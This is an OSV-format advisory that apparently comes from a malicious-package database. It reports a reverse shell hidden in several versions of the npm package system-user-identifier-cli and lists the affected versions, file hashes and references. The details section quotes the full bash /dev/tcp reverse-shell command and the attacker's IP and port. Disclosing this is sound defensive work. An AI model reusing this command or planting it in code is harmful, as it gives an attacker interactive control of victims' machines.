{"id":"MAL-2026-4679","summary":"Malicious code in system-user-identifier-cli (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (4da2798716abd83143a0a2e2b3e5064e2f2a1ac0a63633a70c42881330f52be8)\nindex.js line 13 executes `bash -c \"bash -i \u003e& /dev/tcp/101.43.232.7/7777 0\u003e&1\"` via child_process.exec, opening an interactive reverse shell to the hardcoded attacker-controlled host 101.43.232.7 on TCP port 7777. The shell fires whenever the package's entrypoint is invoked (e.g. via `npx system-user-identifier-cli` or when the module is loaded with `require`), giving the operator of that endpoint full interactive control of the installer's machine with the privileges of the user that ran the tool. The package advertises itself as a trivial 'check system user identifier' utility and ships placeholder author metadata ('Your Name'); the reverse shell is undocumented and inconsistent with the stated purpose. There is no benign interpretation of a hardcoded `/dev/tcp/\u003cip\u003e/\u003cport\u003e` bash redirector pointed at an arbitrary public 
IP.\n","modified":"2026-05-26T06:02:57.397982047Z","published":"2026-05-25T03:45:35Z","database_specific":{"malicious-packages-origins":[{"modified_time":"2026-05-25T03:45:38Z","import_time":"2026-05-26T05:52:52.148466059Z","id":"IN-MAL-2026-004574","versions":["3.0.0"],"source":"amazon-inspector","sha256":"42d50bd01032d74eb793dda2457b06af253c79003f5b50d0e2979880698ab065"},{"modified_time":"2026-05-25T06:36:21Z","import_time":"2026-05-26T05:52:54.130536263Z","id":"IN-MAL-2026-004591","versions":["7.0.1"],"source":"amazon-inspector","sha256":"4da2798716abd83143a0a2e2b3e5064e2f2a1ac0a63633a70c42881330f52be8"},{"modified_time":"2026-05-25T04:06:25Z","import_time":"2026-05-26T05:52:52.605895842Z","id":"IN-MAL-2026-004578","versions":["6.0.0"],"source":"amazon-inspector","sha256":"4f2b4c5d80f52f89845a4391b512fad3c089995c0594ca911b6d31d569820e8c"},{"modified_time":"2026-05-25T03:45:35Z","import_time":"2026-05-26T05:52:52.030949669Z","id":"IN-MAL-2026-004573","versions":["2.0.0"],"source":"amazon-inspector","sha256":"7f1037c433664bc87feded0df6ed7f751d2ea6c22ec88ef2aa2a039a9e85783e"},{"modified_time":"2026-05-25T03:50:27Z","import_time":"2026-05-26T05:52:52.254069541Z","id":"IN-MAL-2026-004575","versions":["4.0.0"],"source":"amazon-inspector","sha256":"83964970fb7996dfdeaed0e9c48b09642bbee83d429b196d8ef819468c847c08"},{"modified_time":"2026-05-25T06:34:36Z","import_time":"2026-05-26T05:52:54.020037755Z","id":"IN-MAL-2026-004590","versions":["7.0.0"],"source":"amazon-inspector","sha256":"a9a27bcdd265fbec58b0e52a3bd28d83906d5b14a2fd1d7e1147b9ef53398676"},{"modified_time":"2026-05-25T03:56:20Z","import_time":"2026-05-26T05:52:52.489170502Z","id":"IN-MAL-2026-004577","versions":["5.0.0"],"source":"amazon-inspector","sha256":"abcc89501c7e97df9031fc62642ea0e78dde0131d38b85b6b6a995c6e8dec2ec"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/system-user-identifier-cli/v/3.0.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/system-user-identifier-cli/
v/7.0.1"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/system-user-identifier-cli/v/6.0.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/system-user-identifier-cli/v/2.0.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/system-user-identifier-cli/v/4.0.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/system-user-identifier-cli/v/7.0.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/system-user-identifier-cli/v/5.0.0"}],"affected":[{"package":{"name":"system-user-identifier-cli","ecosystem":"npm","purl":"pkg:npm/system-user-identifier-cli"},"versions":["3.0.0","7.0.1","6.0.0","2.0.0","4.0.0","7.0.0","5.0.0"],"database_specific":{"cwes":[{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious 
Code"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/system-user-identifier-cli/MAL-2026-4679.json","indicators":{"evidence_files":[{"path":"index.js","tlsh":"47f02da80bf8ae79337848e6ad47512319a3f8003112f498e2ee8e5a83c48440608977","sha256":"01358997508aa66db8dc966dbf8341f8d8c000f5b846b7cacfb3491c5821b56e"},{"path":"package.json","tlsh":"c0e068248670097320c66326ac59d425b321ee2b09043c0837ff205c974d63725fbbbc","sha256":"fab5b7ba469ef62cc886cbc5307ee8a0d441f32f101423288a11ae59a3fda5d7"}],"package_integrity":[{"hashes":{"sha512_sri":"sha512-ecJgDJbJ49PkP5Yv5xnUXnsU5nqK9OyWk5y0xaYYXpaJ8rH3A1oijGTFHEhpSu0uH1ERkJMpL9gtUpcSr+WArA==","sha1":"ce246c5fc86357d0f683b76e897db17d2e2fb82b"},"filename":"system-user-identifier-cli-3.0.0.tgz"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com"],"type":"FINDER"}]}